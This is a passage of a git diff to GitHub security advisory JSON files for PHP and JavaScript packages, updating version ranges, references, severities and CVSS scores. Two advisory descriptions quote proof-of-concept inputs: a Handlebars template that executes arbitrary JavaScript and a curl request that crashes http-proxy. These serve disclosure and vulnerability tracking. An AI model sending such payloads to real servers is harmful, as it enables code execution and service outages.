"https://github.com/FriendsOfPHP/security-advisories/blob/master/friendsoftypo3/mediace/CVE-2020-15086.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/FriendsOfTYPO3/mediace" + }, + { + "type": "WEB", + "url": "https://typo3.org/security/advisory/typo3-ext-sa-2020-014" } ], "database_specific": { @@ -64,7 +72,7 @@ "CWE-325", "CWE-502" ], - "severity": "HIGH", + "severity": "CRITICAL", "github_reviewed": true, "github_reviewed_at": "2020-07-29T16:09:56Z", "nvd_published_at": "2020-07-29T17:15:00Z" diff --git a/advisories/github-reviewed/2020/07/GHSA-m5vr-3m74-jwxp/GHSA-m5vr-3m74-jwxp.json b/advisories/github-reviewed/2020/07/GHSA-m5vr-3m74-jwxp/GHSA-m5vr-3m74-jwxp.json index ec7be16b7760b..a7b2ac9330d8d 100644 --- a/advisories/github-reviewed/2020/07/GHSA-m5vr-3m74-jwxp/GHSA-m5vr-3m74-jwxp.json +++ b/advisories/github-reviewed/2020/07/GHSA-m5vr-3m74-jwxp/GHSA-m5vr-3m74-jwxp.json @@ -52,6 +52,44 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.0.0" + }, + { + "fixed": "10.4.6" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.5.20" + } + ] + } + ] } ], "references": [ @@ -71,6 +109,14 @@ "type": "WEB", "url": "https://github.com/TYPO3/TYPO3.CMS/commit/85d3e70dff35a99ef53f4b561114acfa9e5c47e1" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2020-15098.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2020-15098.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/TYPO3/TYPO3.CMS" diff --git a/advisories/github-reviewed/2020/08/GHSA-h6m7-j4h3-9rf5/GHSA-h6m7-j4h3-9rf5.json b/advisories/github-reviewed/2020/08/GHSA-h6m7-j4h3-9rf5/GHSA-h6m7-j4h3-9rf5.json index e8942d33387b7..0367e1fbbba36 100644 --- a/advisories/github-reviewed/2020/08/GHSA-h6m7-j4h3-9rf5/GHSA-h6m7-j4h3-9rf5.json +++ b/advisories/github-reviewed/2020/08/GHSA-h6m7-j4h3-9rf5/GHSA-h6m7-j4h3-9rf5.json @@ -25,10 +25,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "1.4.0" }, { - "fixed": "1.3.14" + "fixed": "1.4.7" } ] } @@ -44,10 +44,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "1.4.0" + "introduced": "1.5.0" }, { - "fixed": "1.4.7" + "fixed": "1.5.2" } ] } @@ -63,10 +63,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "1.5.0" + "introduced": "1.6.0" }, { - "fixed": "1.5.2" + "fixed": "1.6.4" } ] } @@ -82,10 +82,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "1.6.0" + "introduced": "1.0.0" }, { - "fixed": "1.6.4" + "fixed": "1.3.14" } ] } @@ -105,6 +105,10 @@ "type": "WEB", "url": "https://github.com/Sylius/SyliusResourceBundle/commit/73d9aba182947473a5935b31caf65ca263091e00" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/sylius/resource-bundle/CVE-2020-15146.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/Sylius/SyliusResourceBundle" diff --git a/advisories/github-reviewed/2020/08/GHSA-p4pj-9g59-4ppv/GHSA-p4pj-9g59-4ppv.json b/advisories/github-reviewed/2020/08/GHSA-p4pj-9g59-4ppv/GHSA-p4pj-9g59-4ppv.json index e81d8cba607f6..766c90502f018 100644 --- a/advisories/github-reviewed/2020/08/GHSA-p4pj-9g59-4ppv/GHSA-p4pj-9g59-4ppv.json +++ b/advisories/github-reviewed/2020/08/GHSA-p4pj-9g59-4ppv/GHSA-p4pj-9g59-4ppv.json @@ -25,10 +25,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "1.4.0" }, { - "fixed": "1.3.14" + "fixed": "1.4.7" } ] } @@ -44,10 +44,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "1.4.0" + "introduced": "1.5.0" }, { - "fixed": "1.4.7" + "fixed": "1.5.2" } ] } @@ -63,10 +63,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "1.5.0" + "introduced": "1.6.0" }, { - "fixed": "1.5.2" + "fixed": "1.6.4" } ] } @@ -82,10 +82,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "1.6.0" + "introduced": "1.0.0" }, { - "fixed": "1.6.4" + "fixed": "1.3.14" } ] } @@ -105,6 +105,10 @@ "type": "WEB", "url": "https://github.com/Sylius/SyliusResourceBundle/commit/73ed8b8bb083f36c30ad7c3cec336f65d6a80650" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/sylius/resource-bundle/CVE-2020-15143.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/Sylius/SyliusResourceBundle" diff --git a/advisories/github-reviewed/2020/09/GHSA-2cf5-4w76-r9qv/GHSA-2cf5-4w76-r9qv.json b/advisories/github-reviewed/2020/09/GHSA-2cf5-4w76-r9qv/GHSA-2cf5-4w76-r9qv.json index cd7db0c501c52..933fb2904906d 100644 --- a/advisories/github-reviewed/2020/09/GHSA-2cf5-4w76-r9qv/GHSA-2cf5-4w76-r9qv.json +++ b/advisories/github-reviewed/2020/09/GHSA-2cf5-4w76-r9qv/GHSA-2cf5-4w76-r9qv.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-2cf5-4w76-r9qv", - "modified": "2020-08-31T18:54:52Z", + "modified": "2024-01-29T20:54:51Z", "published": "2020-09-04T14:57:38Z", "aliases": [ @@ -9,7 +9,10 @@ "summary": "Arbitrary Code Execution in handlebars", "details": "Versions of `handlebars` prior to 3.0.8 or 4.5.2 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting).\n\nThe following template can be used to demonstrate the vulnerability: \n```{{#with \"constructor\"}}\n\t{{#with split as |a|}}\n\t\t{{pop (push \"alert('Vulnerable Handlebars JS');\")}}\n\t\t{{#with (concat (lookup join (slice 0 1)))}}\n\t\t\t{{#each (slice 2 3)}}\n\t\t\t\t{{#with (apply 0 a)}}\n\t\t\t\t\t{{.}}\n\t\t\t\t{{/with}}\n\t\t\t{{/each}}\n\t\t{{/with}}\n\t{{/with}}\n{{/with}}```\n\n\n## Recommendation\n\nUpgrade to version 3.0.8, 4.5.2 or later.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:L/I:H/A:L" + } ], "affected": [ { @@ -59,7 +62,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-94" ], "severity": "HIGH", "github_reviewed": true, diff --git a/advisories/github-reviewed/2020/09/GHSA-699q-wcff-g9mj/GHSA-699q-wcff-g9mj.json b/advisories/github-reviewed/2020/09/GHSA-699q-wcff-g9mj/GHSA-699q-wcff-g9mj.json index 44169c4e3afd5..83ee7e53fb28c 100644 --- a/advisories/github-reviewed/2020/09/GHSA-699q-wcff-g9mj/GHSA-699q-wcff-g9mj.json +++ b/advisories/github-reviewed/2020/09/GHSA-699q-wcff-g9mj/GHSA-699q-wcff-g9mj.json @@ -47,6 +47,14 @@ { "type": "WEB", "url": "https://github.com/yiisoft/yii2/commit/9abccb96d7c5ddb569f92d1a748f50ee9b3e2b99" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/yiisoft/yii2/CVE-2020-15148.yaml" + }, + { + "type": "WEB", + "url": "https://www.yiiframework.com/news/303/yii-2-0-38" } ], "database_specific": { diff --git a/advisories/github-reviewed/2020/09/GHSA-6x33-pw7p-hmpq/GHSA-6x33-pw7p-hmpq.json b/advisories/github-reviewed/2020/09/GHSA-6x33-pw7p-hmpq/GHSA-6x33-pw7p-hmpq.json index 2f9b94127813f..2ebf7d641eada 100644 --- a/advisories/github-reviewed/2020/09/GHSA-6x33-pw7p-hmpq/GHSA-6x33-pw7p-hmpq.json +++ b/advisories/github-reviewed/2020/09/GHSA-6x33-pw7p-hmpq/GHSA-6x33-pw7p-hmpq.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-6x33-pw7p-hmpq", - "modified": "2020-08-31T19:01:05Z", + "modified": "2024-01-29T20:57:00Z", "published": "2020-09-04T17:59:49Z", "aliases": [ @@ -9,7 +9,10 @@ "summary": "Denial of Service in http-proxy", "details": "Versions of `http-proxy` prior to 1.18.1 are vulnerable to Denial of Service. An HTTP request with a long body triggers an `ERR_HTTP_HEADERS_SENT` unhandled exception that crashes the proxy server. This is only possible when the proxy server sets headers in the proxy request using the `proxyReq.setHeader` function. \n\nFor a proxy server running on `http://localhost:3000`, the following curl request triggers the unhandled exception: \n```curl -XPOST http://localhost:3000 -d \"$(python -c 'print(\"x\"*1025)')\"```\n\n\n## Recommendation\n\nUpgrade to version 1.18.1 or later", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ { @@ -53,7 +56,8 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-184", + "CWE-693" ], "severity": "HIGH", "github_reviewed": true, diff --git a/advisories/github-reviewed/2020/09/GHSA-754h-5r27-7x3r/GHSA-754h-5r27-7x3r.json b/advisories/github-reviewed/2020/09/GHSA-754h-5r27-7x3r/GHSA-754h-5r27-7x3r.json index 2c6bbe6fa9aa1..e9288bcc93780 100644 --- a/advisories/github-reviewed/2020/09/GHSA-754h-5r27-7x3r/GHSA-754h-5r27-7x3r.json +++ b/advisories/github-reviewed/2020/09/GHSA-754h-5r27-7x3r/GHSA-754h-5r27-7x3r.json @@ -105,6 +105,14 @@ "type": "WEB", "url": "https://github.com/symfony/symfony/commit/d9910e0b33a2e0f993abff41c6fbc86951b66d78" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/http-kernel/CVE-2020-15094.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2020-15094.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/symfony/symfony" @@ -124,6 +132,10 @@ { "type": "WEB", "url": "https://packagist.org/packages/symfony/symfony" + }, + { + "type": "WEB", + "url": "https://symfony.com/cve-2020-15094" } ], "database_specific": { diff --git a/advisories/github-reviewed/2020/09/GHSA-f7wm-x4gw-6m23/GHSA-f7wm-x4gw-6m23.json b/advisories/github-reviewed/2020/09/GHSA-f7wm-x4gw-6m23/GHSA-f7wm-x4gw-6m23.json index 5909654b68913..6f2cb618cfd7a 100644 --- a/advisories/github-reviewed/2020/09/GHSA-f7wm-x4gw-6m23/GHSA-f7wm-x4gw-6m23.json +++ b/advisories/github-reviewed/2020/09/GHSA-f7wm-x4gw-6m23/GHSA-f7wm-x4gw-6m23.json @@ -53,6 +53,63 @@ } ] }, + { + "package": { + "ecosystem": "Packagist", + "name": "contao/contao" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.0.0" + }, + { + "fixed": "4.4.52" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "contao/contao" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.5.0" + }, + { + "fixed": "4.9.6" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "contao/contao" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.10.0" + }, + { + "fixed": "4.10.1" + } + ] + } + ] + }, { "package": { "ecosystem": "Packagist", @@ -70,9 +127,6 @@ } ] } - ], - "versions": [ - "4.10.0" ] } ], @@ -93,6 +147,14 @@ "type": "WEB", "url": "https://contao.org/en/security-advisories/insert-tag-injection-in-forms.html" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/contao/contao/CVE-2020-25768.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/contao/core-bundle/CVE-2020-25768.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/contao/contao" diff --git a/advisories/github-reviewed/2020/10/GHSA-6gw4-x63h-5499/GHSA-6gw4-x63h-5499.json b/advisories/github-reviewed/2020/10/GHSA-6gw4-x63h-5499/GHSA-6gw4-x63h-5499.json index 3d46b3c5a0ea8..9167ed0d2192f 100644 --- a/advisories/github-reviewed/2020/10/GHSA-6gw4-x63h-5499/GHSA-6gw4-x63h-5499.json +++ b/advisories/github-reviewed/2020/10/GHSA-6gw4-x63h-5499/GHSA-6gw4-x63h-5499.json @@ -25,10 +25,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "1.7.0" }, { - "fixed": "1.6.9" + "fixed": "1.7.9" } ] } @@ -44,10 +44,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "1.7.0" + "introduced": "1.8.0" }, { - "fixed": "1.7.9" + "fixed": "1.8.3" } ] } @@ -63,10 +63,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "1.8.0" + "introduced": "1.0.0" }, { - "fixed": "1.8.3" + "fixed": "1.6.9" } ] } @@ -86,6 +86,10 @@ "type": "WEB", "url": "https://github.com/Sylius/Sylius/commit/60636d711a4011e8694d10d201b53632c7e8ecaf" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/sylius/sylius/CVE-2020-15245.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/Sylius/Sylius" diff --git a/advisories/github-reviewed/2020/10/GHSA-7733-hjv6-4h47/GHSA-7733-hjv6-4h47.json b/advisories/github-reviewed/2020/10/GHSA-7733-hjv6-4h47/GHSA-7733-hjv6-4h47.json index 94b364bf874b8..6b84c02b41e90 100644 --- a/advisories/github-reviewed/2020/10/GHSA-7733-hjv6-4h47/GHSA-7733-hjv6-4h47.json +++ b/advisories/github-reviewed/2020/10/GHSA-7733-hjv6-4h47/GHSA-7733-hjv6-4h47.json @@ -147,6 +147,82 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.0.0" + }, + { + "fixed": "8.7.25" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.5.6" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.0.0" + }, + { + "fixed": "8.7.25" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.5.6" + } + ] + } + ] } ], "references": [ @@ -162,6 +238,18 @@ "type": "WEB", "url": "https://github.com/TYPO3/Fluid/commit/9ef6a8ffff2e812025fc0701b4ce72eea6911a3d" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2020-15241.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2020-15241.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3fluid/fluid/CVE-2020-15241.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/TYPO3/Fluid" diff --git a/advisories/github-reviewed/2020/10/GHSA-8gv3-3j7f-wg94/GHSA-8gv3-3j7f-wg94.json b/advisories/github-reviewed/2020/10/GHSA-8gv3-3j7f-wg94/GHSA-8gv3-3j7f-wg94.json index edfd5cd03fe15..427ea7be2b879 100644 --- a/advisories/github-reviewed/2020/10/GHSA-8gv3-3j7f-wg94/GHSA-8gv3-3j7f-wg94.json +++ b/advisories/github-reviewed/2020/10/GHSA-8gv3-3j7f-wg94/GHSA-8gv3-3j7f-wg94.json @@ -139,6 +139,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-15227" }, + { + "type": "WEB", + "url": "https://blog.nette.org/en/cve-2020-15227-potential-remote-code-execution-vulnerability" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/nette/application/CVE-2020-15227.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/nette/application" diff --git a/advisories/github-reviewed/2020/11/GHSA-954j-f27r-cj52/GHSA-954j-f27r-cj52.json b/advisories/github-reviewed/2020/11/GHSA-954j-f27r-cj52/GHSA-954j-f27r-cj52.json index b114b7ca7e99b..cd2d4f456cca6 100644 --- a/advisories/github-reviewed/2020/11/GHSA-954j-f27r-cj52/GHSA-954j-f27r-cj52.json +++ b/advisories/github-reviewed/2020/11/GHSA-954j-f27r-cj52/GHSA-954j-f27r-cj52.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-954j-f27r-cj52", - "modified": "2021-01-07T22:40:37Z", + "modified": "2024-02-05T11:15:53Z", "published": "2020-11-23T21:18:36Z", "aliases": [ "CVE-2020-26228" @@ -52,6 +52,82 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.7.0" + }, + { + "fixed": "8.7.38" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.0.0" + }, + { + "fixed": "10.4.10" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.5.23" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.7.0" + }, + { + "fixed": "8.7.38" + } + ] + } + ] } ], "references": [ @@ -63,6 +139,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-26228" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2020-26228.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2020-26228.yaml" + }, { "type": "WEB", "url": "https://typo3.org/security/advisory/typo3-core-sa-2020-011" @@ -75,6 +159,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2020-11-23T21:10:32Z", - "nvd_published_at": null + "nvd_published_at": "2020-11-23T21:15:12Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2020/11/GHSA-hpjm-3ww5-6cpf/GHSA-hpjm-3ww5-6cpf.json b/advisories/github-reviewed/2020/11/GHSA-hpjm-3ww5-6cpf/GHSA-hpjm-3ww5-6cpf.json index d5c6311fb683c..2dd31e053692e 100644 --- a/advisories/github-reviewed/2020/11/GHSA-hpjm-3ww5-6cpf/GHSA-hpjm-3ww5-6cpf.json +++ b/advisories/github-reviewed/2020/11/GHSA-hpjm-3ww5-6cpf/GHSA-hpjm-3ww5-6cpf.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-hpjm-3ww5-6cpf", - "modified": "2021-01-07T22:41:42Z", + "modified": "2024-02-07T18:52:28Z", "published": "2020-11-18T21:06:07Z", "aliases": [ "CVE-2020-26216" @@ -162,6 +162,10 @@ "type": "WEB", "url": "https://github.com/TYPO3/Fluid/commit/f20db4e74cf9803c6cffca2ed2f03e1b0b89d0dc" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3fluid/fluid/CVE-2020-26216.yaml" + }, { "type": "WEB", "url": "https://typo3.org/security/advisory/typo3-core-sa-2020-009" @@ -171,7 +175,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": "MODERATE", + "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2020-11-17T20:30:15Z", "nvd_published_at": null diff --git a/advisories/github-reviewed/2020/11/GHSA-q9cp-mc96-m4w2/GHSA-q9cp-mc96-m4w2.json b/advisories/github-reviewed/2020/11/GHSA-q9cp-mc96-m4w2/GHSA-q9cp-mc96-m4w2.json index 616ceb787d814..042b8b9dd1559 100644 --- a/advisories/github-reviewed/2020/11/GHSA-q9cp-mc96-m4w2/GHSA-q9cp-mc96-m4w2.json +++ b/advisories/github-reviewed/2020/11/GHSA-q9cp-mc96-m4w2/GHSA-q9cp-mc96-m4w2.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-q9cp-mc96-m4w2", - "modified": "2021-01-07T22:39:29Z", + "modified": "2024-02-05T11:16:11Z", "published": "2020-11-23T21:18:44Z", "aliases": [ "CVE-2020-26229" @@ -25,7 +25,26 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "10.4.0" + "introduced": "10.0.0" + }, + { + "fixed": "10.4.10" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.0.0" }, { "fixed": "10.4.10" @@ -44,6 +63,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-26229" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2020-26229.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2020-26229.yaml" + }, { "type": "WEB", "url": "https://typo3.org/security/advisory/typo3-core-sa-2020-012" @@ -56,6 +83,6 @@ "severity": "LOW", "github_reviewed": true, "github_reviewed_at": "2020-11-23T21:16:32Z", - "nvd_published_at": null + "nvd_published_at": "2020-11-23T22:15:12Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2020/12/GHSA-vqqx-jw6p-q3rf/GHSA-vqqx-jw6p-q3rf.json b/advisories/github-reviewed/2020/12/GHSA-vqqx-jw6p-q3rf/GHSA-vqqx-jw6p-q3rf.json index 4e71d7d432e62..f289b243c7934 100644 --- a/advisories/github-reviewed/2020/12/GHSA-vqqx-jw6p-q3rf/GHSA-vqqx-jw6p-q3rf.json +++ b/advisories/github-reviewed/2020/12/GHSA-vqqx-jw6p-q3rf/GHSA-vqqx-jw6p-q3rf.json @@ -52,6 +52,82 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.7.0" + }, + { + "fixed": "8.7.38" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.0.0" + }, + { + "fixed": "10.4.10" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.5.23" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.7.0" + }, + { + "fixed": "8.7.38" + } + ] + } + ] } ], "references": [ @@ -63,6 +139,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-26227" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2020-26227.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2020-26227.yaml" + }, { "type": "WEB", "url": "https://packagist.org/packages/typo3/cms-core" diff --git a/advisories/github-reviewed/2021/01/GHSA-39wj-j3jc-858m/GHSA-39wj-j3jc-858m.json b/advisories/github-reviewed/2021/01/GHSA-39wj-j3jc-858m/GHSA-39wj-j3jc-858m.json index 3bd5e69d10345..dadbcef923c35 100644 --- a/advisories/github-reviewed/2021/01/GHSA-39wj-j3jc-858m/GHSA-39wj-j3jc-858m.json +++ b/advisories/github-reviewed/2021/01/GHSA-39wj-j3jc-858m/GHSA-39wj-j3jc-858m.json @@ -22,10 +22,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "3.0.0" }, { - "fixed": "2.16.5" + "fixed": "3.2.4" } ] } @@ -41,10 +41,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "3.0.0" + "introduced": "2.0.0" }, { - "fixed": "3.2.4" + "fixed": "2.16.5" } ] } @@ -68,6 +68,10 @@ "type": "WEB", "url": "https://forum.mautic.org/c/announcements/16" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/mautic/core/CVE-2020-35124.yaml" + }, { "type": "WEB", "url": "https://packagist.org/packages/mautic/core" diff --git a/advisories/github-reviewed/2021/01/GHSA-3p32-j457-pg5x/GHSA-3p32-j457-pg5x.json b/advisories/github-reviewed/2021/01/GHSA-3p32-j457-pg5x/GHSA-3p32-j457-pg5x.json index dae88d6521644..0ccf77c0edd11 100644 --- a/advisories/github-reviewed/2021/01/GHSA-3p32-j457-pg5x/GHSA-3p32-j457-pg5x.json +++ b/advisories/github-reviewed/2021/01/GHSA-3p32-j457-pg5x/GHSA-3p32-j457-pg5x.json @@ -25,10 +25,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "8.0.0" }, { - "fixed": "6.20.12" + "fixed": "8.22.1" } ] } @@ -37,7 +37,7 @@ { "package": { "ecosystem": "Packagist", - "name": "laravel/framework" + "name": "illuminate/database" }, "ranges": [ { @@ -56,7 +56,7 @@ { "package": { "ecosystem": "Packagist", - "name": "laravel/framework" + "name": "illuminate/database" }, "ranges": [ { @@ -82,7 +82,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "6.0.0" }, { "fixed": "6.20.12" @@ -94,17 +94,17 @@ { "package": { "ecosystem": "Packagist", - "name": "illuminate/database" + "name": "laravel/framework" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { - "introduced": "7.0.0" + "introduced": "6.0.0" }, { - "fixed": "7.30.3" + "fixed": "6.20.11" } ] } @@ -113,17 +113,17 @@ { "package": { "ecosystem": "Packagist", - "name": "illuminate/database" + "name": "laravel/framework" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { - "introduced": "8.0.0" + "introduced": "7.0.0" }, { - "fixed": "8.22.1" + "fixed": "7.30.2" } ] } @@ -147,6 +147,18 @@ "type": "WEB", "url": "https://blog.laravel.com/security-laravel-62011-7302-8221-released" }, + { + "type": "WEB", + "url": "https://blog.laravel.com/security-laravel-62012-7303-released" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/illuminate/database/CVE-2021-21263.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/laravel/framework/CVE-2021-21263.yaml" + }, { "type": "WEB", "url": "https://packagist.org/packages/illuminate/database" diff --git a/advisories/github-reviewed/2021/01/GHSA-p7v4-gm6j-cw9m/GHSA-p7v4-gm6j-cw9m.json b/advisories/github-reviewed/2021/01/GHSA-p7v4-gm6j-cw9m/GHSA-p7v4-gm6j-cw9m.json index df8523e6d7ad4..55b93f9e44b95 100644 --- a/advisories/github-reviewed/2021/01/GHSA-p7v4-gm6j-cw9m/GHSA-p7v4-gm6j-cw9m.json +++ b/advisories/github-reviewed/2021/01/GHSA-p7v4-gm6j-cw9m/GHSA-p7v4-gm6j-cw9m.json @@ -22,10 +22,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "3.0.0" }, { - "fixed": "2.16.5" + "fixed": "3.2.4" } ] } @@ -41,10 +41,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "3.0.0" + "introduced": "2.0.0" }, { - "fixed": "3.2.4" + "fixed": "2.16.5" } ] } @@ -64,6 +64,10 @@ "type": "WEB", "url": "https://github.com/mautic/mautic/commit/ba31db23e664f889da55a29ff27f797e2ab5cb1b" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/mautic/core/CVE-2021-3142.yaml" + }, { "type": "WEB", "url": "https://github.com/mautic/mautic/releases/tag/3.2.4" @@ -71,6 +75,10 @@ { "type": "WEB", "url": "https://www.mautic.org/blog/community/security-release-all-versions-mautic-prior-2-16-5-and-3-2-3" + }, + { + "type": "WEB", + "url": "https://www.mautic.org/blog/community/security-release-all-versions-mautic-prior-2-16-5-and-3-2-4" } ], "database_specific": { diff --git 